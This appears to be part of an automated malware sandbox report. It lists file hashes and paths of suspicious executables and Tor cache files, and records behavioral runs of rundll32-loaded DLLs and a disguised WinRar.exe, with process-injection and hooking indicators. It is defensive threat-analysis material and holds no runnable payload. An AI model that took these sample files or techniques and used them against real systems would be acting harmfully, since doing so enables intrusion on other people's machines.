SHA256 f73452f0f414bca5f67f9a4d3e9b37284961bc7cacdbc7a6ee19a53e9a3d91da
SHA512 900fca6f0d356ef4ba1567c2db0373e649ec7192e2237201d6c6ae7168d5d171335764ad9d3b3e8a8b3b9eb8e3900ce1ec38dd7a1b33a0e3a608e23c64cd54a0

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus.tmp

MD5 3384df11645214991c43cc79c6162542
SHA1 0c0eb94d9f00aa8388134b56f5518549772941d5
SHA256 c16d54482c78c77562c21f8a2e2463360d923c208cad1c80826bf8267182453a
SHA512 0faf6bae1e84efde2e197b31678e52dc74dde930852810b3b5db01148faa92efb1841b46a831fd4e73f2d67df27f1dbadb3111f1bf8272a965976a74b8988c68

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new

MD5 e05046201fd81921b7688a29b9c61cbc
SHA1 04bd579b42bd45156569ad63e5a23893a316c0c4
SHA256 1324d67ba05fc87d734c72dbee505e7cd8402766d39d0408d36ed97f93b0e37a
SHA512 6081c0b628a9b7da96856c1ceff2ff8e9994d49e356edcbd871d5fd6659914d55e78e4c0d492a8385a79ad1dfc52e5920556ee177a3d5d606cd0781cfda7771e

C:\Users\Admin\Documents\GuardFox\RfHaLGAD1f_KWSrCQe5tWOzu.exe

MD5 7e6d304f94b7413e05462a6256ebfd3a
SHA1 771ad41ac14c3d4ea101e94a088dcb95fc22a1e9
SHA256 1da512678c1343da62b47af2859849816d8e6a1943306c5f345091e719510fe6
SHA512 b6fb6c47412ddda4c33fe429a29d11355abcbc0bbc3b51aacfcb452ac9f7b30eabf72df8a2a1346224d751747c3dc08553416949597d2836094dc6babde0bf93

C:\Users\Admin\Documents\GuardFox\_WmA4UeHN2lS8kJMKSI_Okk5.exe

MD5 75fd41e8b9312cdc5e12869b3f8e120a
SHA1 7ad734927bb5f359d1d710f51508cb24cdec73d9
SHA256 25d1dc125433097e2fcacc0892ac2ccf4c0e378eff2cc3f6881992f2641e8d03
SHA512 94cff0b426135678f4efc1610aaed8ce659189d28cb6b4d4e9a9fd868ec87227327c1cf53284719dce3d4c4aad97ae0b1b1c734ae9250afaf2d00c8700eaeab8

Analysis: behavioral5

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:49

Platform

win7-20240221-en

Max time kernel

117s

Max time network

132s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 228

Network

N/A

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win10v2004-20240221-en

Max time kernel

149s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Signatures

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 204.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 196.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win7-20240215-en

Max time kernel

117s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1204 wrote to memory of 1244 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1204 wrote to memory of 1244 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1204 wrote to memory of 1244 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1204 wrote to memory of 1244 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1204 wrote to memory of 1244 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1204 wrote to memory of 1244 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1204 wrote to memory of 1244 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Network

N/A

Files

N/A